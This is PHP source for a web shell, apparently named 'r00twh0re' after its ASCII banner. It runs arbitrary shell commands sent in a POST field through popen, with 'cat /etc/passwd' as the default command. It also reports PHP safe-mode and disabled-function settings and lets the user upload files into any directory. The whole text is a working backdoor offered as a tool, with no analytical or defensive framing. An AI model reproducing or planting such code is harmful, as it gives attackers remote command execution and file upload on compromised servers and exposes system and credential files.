if($_POST['dir'] == "") { $curdir = `pwd`; } else { $curdir = $_POST['dir']; } if($_POST['b0x'] == "") { $curcmd = "cat /etc/passwd"; } else { $curcmd = $_POST['b0x']; } ?>
___ ___ _ _ ___ _ __ / _ \ / _ \| |___ _| |__ / _ \ _ __ ___ | '__| | | | | | | __\ \ /\ / / '_ \| | | | '__/ _ \ | | | |_| | |_| | |_ \ V V /| | | | |_| | | | __/ |_| \___/ \___/ \__| \_/\_/ |_| |_|\___/|_| \___| $ob = @ini_get("open_basedir"); $df = @ini_get("disable_functions"); if( ini_get('safe_mode') ) { echo "SM: 1 \\ "; } else { echo "SM: 0 \\ "; } if(''==$df) { echo "DF: 0 \\ "; } else { echo "DF: ".$df." \\ "; } echo "".php_uname()."\n"; ?>
if(($_POST['upl']) == "Upload" ) { if (move_uploaded_file($_FILES['fila']['tmp_name'], $curdir."/".$_FILES['fila']['name'])) { echo "Upload Done !
"; } else { echo "Upload Failed !"; } } if(($_POST['exe']) == "Execute") { $curcmd = "cd ".$curdir.";".$curcmd; $f=popen($curcmd,"r"); while (!feof($f)) { $buffer = fgets($f, 4096); $string .= $buffer; } pclose($f); echo htmlspecialchars($string); } ?>